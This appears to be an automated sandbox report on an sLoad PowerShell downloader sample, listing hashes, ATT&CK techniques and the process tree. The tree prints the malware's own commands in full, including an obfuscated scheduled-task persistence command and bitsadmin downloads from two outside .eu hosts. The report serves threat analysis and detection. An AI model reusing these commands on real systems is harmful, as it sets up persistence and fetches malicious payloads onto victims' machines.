sload | 0af312c6ae5a1d708966fb550dcae81f59db5a54421803b40bd8b2752fb7ee89

General

Target

FILE POWERSHELL MALEVOLO.ps1
Size

104KB
MD5

ef3e1a843da4fb31012afe474447c98b
SHA1

0ca2a653b3cc7d8630e2938c18ce5dda91e0b9b7
SHA256

488d775b3e2118b63dfc26020e5e7a3aa95951f78099ce8e203d50b3e1e0c66d
SHA512

149744665463591cea2798f4efd90b7d5b24c763270e8530c40b7520892b67b0f92b0268456eaa5c545a1984cddca45dddb4e0461c72eee0b3f8db9592f1ec55
SSDEEP

3072:ZtW7qBQqhDmaA8Hch3g+XdZQaPU91ajO3vQSo:gqBQqhDmaA8HW3g+XdZQaPU91ajO3vQH

Score

10^/10

sload dropper execution stealer trojan

Malware Config

Signatures

Sload family
sload
sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload
Download via BitsAdmin 1 TTPs 2 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exe

pid process

2580 bitsadmin.exe
2152 bitsadmin.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2220 powershell.exe
2980 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3036 schtasks.exe

pid	process
2580	bitsadmin.exe
2152	bitsadmin.exe

pid	process
3036	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exe

pid	process
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2220 powershell.exe
Token: SeDebugPrivilege 2980 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

powershell.execmd.exetaskeng.exewscript.EXEpowershell.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2220 wrote to memory of 2816	2220	powershell.exe	schtasks.exe
PID 2220 wrote to memory of 2816	2220	powershell.exe	schtasks.exe
PID 2220 wrote to memory of 2816	2220	powershell.exe	schtasks.exe
PID 2220 wrote to memory of 2508	2220	powershell.exe	schtasks.exe
PID 2220 wrote to memory of 2508	2220	powershell.exe	schtasks.exe
PID 2220 wrote to memory of 2508	2220	powershell.exe	schtasks.exe
PID 2220 wrote to memory of 2868	2220	powershell.exe	cmd.exe
PID 2220 wrote to memory of 2868	2220	powershell.exe	cmd.exe
PID 2220 wrote to memory of 2868	2220	powershell.exe	cmd.exe
PID 2868 wrote to memory of 3036	2868	cmd.exe	schtasks.exe
PID 2868 wrote to memory of 3036	2868	cmd.exe	schtasks.exe
PID 2868 wrote to memory of 3036	2868	cmd.exe	schtasks.exe
PID 1864 wrote to memory of 2956	1864	taskeng.exe	wscript.EXE
PID 1864 wrote to memory of 2956	1864	taskeng.exe	wscript.EXE
PID 1864 wrote to memory of 2956	1864	taskeng.exe	wscript.EXE
PID 2956 wrote to memory of 2980	2956	wscript.EXE	powershell.exe
PID 2956 wrote to memory of 2980	2956	wscript.EXE	powershell.exe
PID 2956 wrote to memory of 2980	2956	wscript.EXE	powershell.exe
PID 2980 wrote to memory of 2432	2980	powershell.exe	getmac.exe
PID 2980 wrote to memory of 2432	2980	powershell.exe	getmac.exe
PID 2980 wrote to memory of 2432	2980	powershell.exe	getmac.exe
PID 2980 wrote to memory of 1952	2980	powershell.exe	cmd.exe
PID 2980 wrote to memory of 1952	2980	powershell.exe	cmd.exe
PID 2980 wrote to memory of 1952	2980	powershell.exe	cmd.exe
PID 2980 wrote to memory of 2376	2980	powershell.exe	cmd.exe
PID 2980 wrote to memory of 2376	2980	powershell.exe	cmd.exe
PID 2980 wrote to memory of 2376	2980	powershell.exe	cmd.exe
PID 1952 wrote to memory of 2172	1952	cmd.exe	bitsadmin.exe
PID 1952 wrote to memory of 2172	1952	cmd.exe	bitsadmin.exe
PID 1952 wrote to memory of 2172	1952	cmd.exe	bitsadmin.exe
PID 2980 wrote to memory of 2368	2980	powershell.exe	cmd.exe
PID 2980 wrote to memory of 2368	2980	powershell.exe	cmd.exe
PID 2980 wrote to memory of 2368	2980	powershell.exe	cmd.exe
PID 2368 wrote to memory of 2580	2368	cmd.exe	bitsadmin.exe
PID 2368 wrote to memory of 2580	2368	cmd.exe	bitsadmin.exe
PID 2368 wrote to memory of 2580	2368	cmd.exe	bitsadmin.exe
PID 2376 wrote to memory of 2152	2376	cmd.exe	bitsadmin.exe
PID 2376 wrote to memory of 2152	2376	cmd.exe	bitsadmin.exe
PID 2376 wrote to memory of 2152	2376	cmd.exe	bitsadmin.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\FILE POWERSHELL MALEVOLO.ps1"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:2816
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /change /tn GoFast /disable
  2⤵
  PID:2508
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0XTKnirWsl" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\XTKnirWsl\RnicSJUN.tmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\system32\schtasks.exe
    schtasks /F /Create /sc minute /mo 3 /TN "S0XTKnirWsl" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\XTKnirWsl\RnicSJUN.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3036

C:\Windows\system32\taskeng.exe
taskeng.exe {473ECEEF-6F43-4A26-B813-E4E9EE74DB3E} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1864
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\XTKnirWsl\RnicSJUN.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file RnicSJUN.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\system32\getmac.exe
      "C:\Windows\system32\getmac.exe" /fo table
      4⤵
      PID:2432
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C bitsadmin /reset
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1952
    - - C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /reset
        5⤵
        
        PID:2172
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer wlmUIGyP /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=631409dba6ea2d77c8dc83dbccd31911" C:\users\Admin\AppData\Roaming\XTKnirWsl\0_svchost.log
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2376
    - - C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer wlmUIGyP /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=631409dba6ea2d77c8dc83dbccd31911" C:\users\Admin\AppData\Roaming\XTKnirWsl\0_svchost.log
        5⤵
        Download via BitsAdmin
        
        PID:2152
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer dnGhLVYN /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=631409dba6ea2d77c8dc83dbccd31911" C:\users\Admin\AppData\Roaming\XTKnirWsl\1_svchost.log
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2368
    - - C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer dnGhLVYN /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=631409dba6ea2d77c8dc83dbccd31911" C:\users\Admin\AppData\Roaming\XTKnirWsl\1_svchost.log
        5⤵
        Download via BitsAdmin
        
        PID:2580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

BITS Jobs

1

T1197

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
01939f2682b48722ab54f21b70d6f325

SHA1
75cbc7cd8a8950b1992ec63358dc0fe5883feb84

SHA256
56e27d223e7498cb8f2aabc27c7d82df96cc96e0a81a3deb2ab97508e5c71caf

SHA512
baeed0b84c1e8bb8e81c39d9f95ffa7c719a8460b325d2c5311b8735f3d58701295c449af6d949d93853a277d315cd8736ba821cfa265ed7608377733783c018

Download Submit
C:\users\Admin\AppData\Roaming\XTKnirWsl\RnicSJUN.ps1

Filesize
1KB

MD5
f556d6fdea8518dc4359595a4d671113

SHA1
ba32bd2817409a3f8298a6eceb422115ffbc4c6f

SHA256
7adf0ecf743b5870526f04de9a3cd45232e28a5b8f81d57c6bed82511a2b6d5d

SHA512
394e396efbc4f6b0d89fe589abf0878cc12bb30c0d6fbe79ad2ecf4284e6949ac5b41fa38dd99c4ad10d48a84503369c1bf48c474c84ca07de09b223be85bc4f

Download Submit
C:\users\Admin\AppData\Roaming\XTKnirWsl\system.ini

Filesize
160KB

MD5
911c95cef0824a684d2479804eb8cf19

SHA1
b72c5d8b9f0eafe0da129feedf162e479a3e1718

SHA256
0d3caf29e9098f00ef0e6f76e9426ed49bdfd8961b6128a3bf3b0274cc6b1c1b

SHA512
bfd8c85700db69c261d0676bfa8199eb3f079c089364ea7f734f85e5fae103347ceb74fc29c23ae59803cc3878298853b8d653fa1d6cac5ed53302b9b03b835a

Download Submit
C:\users\Admin\AppData\Roaming\XTKnirWsl\win.ini

Filesize
1KB

MD5
f3e4808ac14e8e115363902a0cbbdb6d

SHA1
a984a9abfdae900df5733d3c51627afccbbd5201

SHA256
2e77398371a5d0f40bcc5702220c964ea06595d2af3e166d16e49203ba5d1aaf

SHA512
c79fb71bd3a4b5f62b1d3d50c6da91057510b2ecf4014bf569f4efe80e2d4ff5280aafd538cbf740feacb18802ed14806248bf6178a53cdb325fb93d98f89de0

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\users\Admin\AppData\Roaming\XTKnirWsl\RnicSJUN.tmp

Filesize
1KB

MD5
23bc708a3216885dd8e802f70b8dc519

SHA1
dcf8d5290811bf08c99b7d0619ce44f932133bde

SHA256
3ee5348f5e702b3290228201fa842eb957c63fc581203231a6afac1659e8ac37

SHA512
3e8c55f63d67193be8baca9e8d16ea0350f2719dd1f9590c5ff8e8ef690061a9f2b63a46e862c11c4fa2fada58b95493460cfea70e2e58f5a6bbffb4e5c1843d

Download Submit
memory/2220-16-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-11-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-4-0x000007FEF67BE000-0x000007FEF67BF000-memory.dmp

Filesize
4KB

Download
memory/2220-10-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-9-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-8-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-7-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-6-0x0000000002520000-0x0000000002528000-memory.dmp

Filesize
32KB

Download
memory/2220-5-0x000000001B2A0000-0x000000001B582000-memory.dmp

Filesize
2.9MB

Download
memory/2980-24-0x000000001B390000-0x000000001B672000-memory.dmp

Filesize
2.9MB

Download
memory/2980-25-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads